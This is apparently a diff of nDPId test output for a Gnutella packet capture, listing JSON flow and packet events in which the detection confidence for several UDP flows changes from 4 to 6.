{"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
01405{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":793,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":250,"flow_packet_id":2,"flow_last_seen":90003,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":769,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":769,"pkt_l4_len":735,"thread_ts_msec":90003,"pkt":"CAAn5uVZUlQAEjUCCABFAALzAzwAAEARm5UzRJnWCgACD2aNcAkC356C0U0xAgQATbK3Z+3BHrxn1kQAAMACAAAGR1RLRwAAP8uu0MEeyu8HazDjgCpjZAKtBhAEM0SZ1maNAQAAAAT9K4fbFEdUS0cAACn0WLPxWtQpnmCbIRk+uW\/YiZplBGBBRMKKmUdUS0cAACpy2K\/2hky2jG7eBxG55EuSykYdBLVUshDrZkdUS0cAACwUV8A2ZtuYGpHmurFJ9ZjbPjd\/BEIe3bUu7FdTSFIAACfu4Bqdy+iW81L+1nr6boaqfinyBC1Yddoa\/UdUS0cAADcgJ3MxU+9gPezRvKa4p+wbOpp4BLnL2lzegldTSFIAAAl5O+8DCDmOkVzxf\/SPVwlYhBdwBEiMeCm6e0dUS0cAAAucDVWlpiFF+O+mADztiMF+lbMgBMEl\/4LwsEdUS0cAAAyXtfcHfbQ8qEf8F4epyaClpDRCBFh4Sddf8kdUS0cAAA1pNBGyU44u8atjdhBEZcvofBcyBFA93fZ3cUdUS0cAAAAs7ncgF1geHmh4DMpMbatHwhb+BGD2nH7EeUdUS0cAAABa1S31uxK2I4OJWHaC\/PKs7lhZBFK1+9qOEFdTSFIAAAPVZnOFlO42Ib8H+pWWlT4wyAL3BBga2F82QUdUS0cAAAZMeTOG2LuCeHzpFv+0pfJ1qOd4BGfoa2Sp9EdUS0cAABiF4URzeX7Vdi93GjTzJphEA0s1BC6AcmsZskdUS0cAABjf5v+Urk90V\/WPMxinQSIciE4\/BDzxMMJTNUdUS0cAABnDsbPWKLbuWCN54AyWtjRM+4cSBFlLNBOzuldTSFIAABreJpDCEhk5HaHmWa2KZ2KgQT+tBFLZsDQdFkdUS0cAABpaaFBDXGgpcSmxYhITGidbcBteBEuFZV3Mj0dUS0cAAB9npzFZ8csWEevUVjGg\/Ev3bcglBF8KzUMtU0dUS0cAABEOG4JNEDwVGDdOEVl98CTJsF5uBMvcxvQEqg=="} 00558{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":794,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90004,"flow_last_seen":90004,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":90004,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"72.140.120.41","src_port":28681,"dst_port":47739,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":794,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":252,"flow_packet_id":1,"flow_last_seen":90004,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":90004,"pkt":"UlQAEjUCCAAn5uVZCABFAABtaUEAAIARBHsKAAIPSIx4KXAJunsAWfVM+10xAo9f69NRsDNb4\/pKE0QAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAACidCo0G3v\/IJjwziXwskXn9hKth"} -00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":794,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90004,"flow_last_seen":90004,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":90004,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"72.140.120.41","src_port":28681,"dst_port":47739,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":794,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90004,"flow_last_seen":90004,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":90004,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"72.140.120.41","src_port":28681,"dst_port":47739,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": 
{"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00559{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":795,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90005,"flow_last_seen":90005,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":90005,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"193.37.255.130","src_port":28681,"dst_port":61616,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":795,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":253,"flow_packet_id":1,"flow_last_seen":90005,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":90005,"pkt":"UlQAEjUCCAAn5uVZCABFAABtgogAAIAR60AKAAIPwSX\/gnAJ8LAAWXkqrf0xAupVi8ylWZxhuwdOwkQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAACidCo0G3v\/IJjwziXwskXn9hKth"} -00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":795,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90005,"flow_last_seen":90005,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":90005,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"193.37.255.130","src_port":28681,"dst_port":61616,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":795,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90005,"flow_last_seen":90005,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":90005,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"193.37.255.130","src_port":28681,"dst_port":61616,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00558{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":796,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90005,"flow_last_seen":90005,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":90005,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"88.120.73.215","src_port":28681,"dst_port":24562,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00537{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":796,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":254,"flow_packet_id":1,"flow_last_seen":90005,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":90005,"pkt":"UlQAEjUCCAAn5uVZCABFAABt+\/sAAIARkCYKAAIPWHhJ13AJX\/IAWfWM7VYxAm\/Ch\/PFy9OUV6XMR0QAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAACidCo0G3v\/IJjwziXwskXn9hKth"} 
-00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":796,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90005,"flow_last_seen":90005,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":90005,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"88.120.73.215","src_port":28681,"dst_port":24562,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":796,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90005,"flow_last_seen":90005,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":90005,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"88.120.73.215","src_port":28681,"dst_port":24562,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
01410{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":797,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":254,"flow_packet_id":2,"flow_last_seen":90038,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":769,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":769,"pkt_l4_len":735,"thread_ts_msec":90038,"pkt":"CAAn5uVZUlQAEjUCCABFAALzAz0AAEARxl9YeEnXCgACD1\/ycAkC3xJi7VYxAm\/Ch\/PFy9OUV6XMR0QAAMACAAAGR1RLRwAADJe19wd9tDyoR\/wXh6nJoKWkNEIEWHhJ11\/yAQAAAATxtX5bFEdUS0cAACn0WLPxWtQpnmCbIRk+uW\/YiZplBGBBRMKKmUdUS0cAACpy2K\/2hky2jG7eBxG55EuSykYdBLVUshDrZkdUS0cAACwUV8A2ZtuYGpHmurFJ9ZjbPjd\/BEIe3bUu7FdTSFIAACfu4Bqdy+iW81L+1nr6boaqfinyBC1Yddoa\/UdUS0cAAD\/LrtDBHsrvB2sw44AqY2QCrQYQBDNEmdZmjUdUS0cAADcgJ3MxU+9gPezRvKa4p+wbOpp4BLnL2lzegldTSFIAAAl5O+8DCDmOkVzxf\/SPVwlYhBdwBEiMeCm6e0dUS0cAAAucDVWlpiFF+O+mADztiMF+lbMgBMEl\/4LwsEdUS0cAAA1pNBGyU44u8atjdhBEZcvofBcyBFA93fZ3cUdUS0cAAAAs7ncgF1geHmh4DMpMbatHwhb+BGD2nH7EeUdUS0cAAABa1S31uxK2I4OJWHaC\/PKs7lhZBFK1+9qOEFdTSFIAAAPVZnOFlO42Ib8H+pWWlT4wyAL3BBga2F82QUdUS0cAAAZMeTOG2LuCeHzpFv+0pfJ1qOd4BGfoa2Sp9EdUS0cAABiF4URzeX7Vdi93GjTzJphEA0s1BC6AcmsZskdUS0cAABjf5v+Urk90V\/WPMxinQSIciE4\/BDzxMMJTNUdUS0cAABnDsbPWKLbuWCN54AyWtjRM+4cSBFlLNBOzuldTSFIAABreJpDCEhk5HaHmWa2KZ2KgQT+tBFLZsDQdFkdUS0cAABpaaFBDXGgpcSmxYhITGidbcBteBEuFZV3Mj0dUS0cAABEOG4JNEDwVGDdOEVl98CTJsF5uBMvcxvQEqkdUS0cAABK1XVsEZ16ugW6JpsS4xfhpSq81BEjJ0DmW2Q=="} 00558{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":798,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90039,"flow_last_seen":90039,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":90039,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.61.221.246","src_port":28681,"dst_port":30577,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":798,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":255,"flow_packet_id":1,"flow_last_seen":90039,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":90039,"pkt":"UlQAEjUCCAAn5uVZCABFAABt7XgAAIAREsUKAAIPUD3d9nAJd3EAWbzbp0UxAokhPuR+ZJu6wwLrOkQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAACidCo0G3v\/IJjwziXwskXn9hKth"} -00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":798,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90039,"flow_last_seen":90039,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":90039,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.61.221.246","src_port":28681,"dst_port":30577,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":798,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90039,"flow_last_seen":90039,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":90039,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.61.221.246","src_port":28681,"dst_port":30577,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": 
{"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00559{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":799,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90039,"flow_last_seen":90039,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":90039,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.246.156.126","src_port":28681,"dst_port":50297,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":799,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":256,"flow_packet_id":1,"flow_last_seen":90039,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":90039,"pkt":"UlQAEjUCCAAn5uVZCABFAABtEcIAAIARHzsKAAIPYPacfnAJxHkAWRCy7dwxAiOKI2B1HBL1\/IoOJUQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAACidCo0G3v\/IJjwziXwskXn9hKth"} -00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":799,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90039,"flow_last_seen":90039,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":90039,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.246.156.126","src_port":28681,"dst_port":50297,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":799,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90039,"flow_last_seen":90039,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":90039,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.246.156.126","src_port":28681,"dst_port":50297,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00559{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":800,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90039,"flow_last_seen":90039,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":90039,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"82.181.251.218","src_port":28681,"dst_port":36368,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":800,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":257,"flow_packet_id":1,"flow_last_seen":90039,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":90039,"pkt":"UlQAEjUCCAAn5uVZCABFAABtsx4AAIARLMMKAAIPUrX72nAJjhAAWVPSkYYxArzIs2GmVy70sFjiYEQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAACidCo0G3v\/IJjwziXwskXn9hKth"} 
-00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":800,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90039,"flow_last_seen":90039,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":90039,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"82.181.251.218","src_port":28681,"dst_port":36368,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":800,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90039,"flow_last_seen":90039,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":90039,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"82.181.251.218","src_port":28681,"dst_port":36368,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
01407{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":801,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":255,"flow_packet_id":2,"flow_last_seen":90071,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":769,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":769,"pkt_l4_len":735,"thread_ts_msec":90071,"pkt":"CAAn5uVZUlQAEjUCCABFAALzAz4AAEAROnpQPd32CgACD3dxcAkC3wb\/p0UxAokhPuR+ZJu6wwLrOkQAAMACAAAGR1RLRwAADWk0EbJTji7xq2N2EERly+h8FzIEUD3d9ndxAQAAAATOg6hoFEdUS0cAACn0WLPxWtQpnmCbIRk+uW\/YiZplBGBBRMKKmUdUS0cAACpy2K\/2hky2jG7eBxG55EuSykYdBLVUshDrZkdUS0cAACwUV8A2ZtuYGpHmurFJ9ZjbPjd\/BEIe3bUu7FdTSFIAACfu4Bqdy+iW81L+1nr6boaqfinyBC1Yddoa\/UdUS0cAAD\/LrtDBHsrvB2sw44AqY2QCrQYQBDNEmdZmjUdUS0cAADcgJ3MxU+9gPezRvKa4p+wbOpp4BLnL2lzegldTSFIAAAl5O+8DCDmOkVzxf\/SPVwlYhBdwBEiMeCm6e0dUS0cAAAucDVWlpiFF+O+mADztiMF+lbMgBMEl\/4LwsEdUS0cAAAyXtfcHfbQ8qEf8F4epyaClpDRCBFh4Sddf8kdUS0cAAAAs7ncgF1geHmh4DMpMbatHwhb+BGD2nH7EeUdUS0cAAABa1S31uxK2I4OJWHaC\/PKs7lhZBFK1+9qOEFdTSFIAAAPVZnOFlO42Ib8H+pWWlT4wyAL3BBga2F82QUdUS0cAAAZMeTOG2LuCeHzpFv+0pfJ1qOd4BGfoa2Sp9EdUS0cAABiF4URzeX7Vdi93GjTzJphEA0s1BC6AcmsZskdUS0cAABjf5v+Urk90V\/WPMxinQSIciE4\/BDzxMMJTNUdUS0cAABnDsbPWKLbuWCN54AyWtjRM+4cSBFlLNBOzuldTSFIAABreJpDCEhk5HaHmWa2KZ2KgQT+tBFLZsDQdFkdUS0cAABpaaFBDXGgpcSmxYhITGidbcBteBEuFZV3Mj0dUS0cAAB9npzFZ8csWEevUVjGg\/Ev3bcglBF8KzUMtU0dUS0cAABEOG4JNEDwVGDdOEVl98CTJsF5uBMvcxvQEqg=="} 00557{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":802,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90072,"flow_last_seen":90072,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":90072,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.26.216.95","src_port":28681,"dst_port":13889,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":802,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":258,"flow_packet_id":1,"flow_last_seen":90072,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":90072,"pkt":"UlQAEjUCCAAn5uVZCABFAABthFwAAIARuZsKAAIPGBrYX3AJNkEAWZh4MEMxAu0STIEN6nLhhZZqvEQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAACidCo0G3v\/IJjwziXwskXn9hKth"} -00751{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":802,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90072,"flow_last_seen":90072,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":90072,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.26.216.95","src_port":28681,"dst_port":13889,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00751{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":802,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90072,"flow_last_seen":90072,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":90072,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.26.216.95","src_port":28681,"dst_port":13889,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": 
{"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00560{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":803,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90072,"flow_last_seen":90072,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":90072,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"103.232.107.100","src_port":28681,"dst_port":43508,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":803,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":259,"flow_packet_id":1,"flow_last_seen":90072,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":90072,"pkt":"UlQAEjUCCAAn5uVZCABFAABt0UkAAIARidsKAAIPZ+hrZHAJqfQAWVSlBkIxAi75axRUS7XsWs\/C60QAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAACidCo0G3v\/IJjwziXwskXn9hKth"} -00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":803,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90072,"flow_last_seen":90072,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":90072,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"103.232.107.100","src_port":28681,"dst_port":43508,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
